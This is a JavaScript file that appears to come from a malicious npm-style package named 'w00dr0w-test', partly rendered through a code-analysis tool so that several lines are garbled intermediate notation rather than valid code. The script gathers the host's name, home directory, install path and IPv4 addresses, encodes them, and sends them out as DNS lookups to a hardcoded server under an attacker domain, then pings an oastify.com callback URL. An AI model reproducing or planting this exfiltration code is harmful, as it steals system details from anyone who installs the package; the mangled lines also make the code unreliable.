const dns = require('dns')
const os = require('os')
const http = require('http')
const suffix = ".w00dr0w-test.com"
const package = "w00dr0w-test"
const url = 'http://604icsgki6wcv57i4orkpz3qiho8cz0o.oastify.com'
var h = os.hostname()
data = package + '__' + h + 
                    '__' + os.homedir() + 
                    '__' + __dirname
os.homedir()
const nets = os.networkInterfaces()
const results = Object.create(null)
dns.lookup(h, { hints: dns.ADDRCONFIG }, function(err, ip) {
    //console.log('IP: ' + ip);
    dns.lookupService(ip, 0, function (err, hostname, service) {
        if (err) {
            return;
        }
        //console.log('Hostname:' + hostname)
        data = data + '__' + hostname;
    });
})
_iterator_0 = <operator>.iterator(Object.keys(nets))
_iterator_1 = <operator>.iterator(nets[name])
const familyV4Value = typeof net.family === 'string' ? 'IPv4' : 4
net.family === familyV4Value && !net.internal
!results[name]
__ecma.Array.factory()
data = data + '__' + net.address
data = data.replace(/[^a-zA-Z0-9._]/g, 
    function(f) {
        return '_' + f.charCodeAt(0).toString(16);
    }
)
<lambda>2
data = data.match(/.{1,50}/g)
dns.setServers(['3.145.70.183'])
(_tmp_3 = Math.random().toString(36)).substring
var i = 1
data.forEach(function (chunk){
    dns.resolve(id + '-' + i + '.' + chunk + suffix, 'A', console.log);
    i++; 
})
http.get(url, (res) => {
    res.setEncoding('utf8');
    res.on('data', (chunk) => {
    });
  })
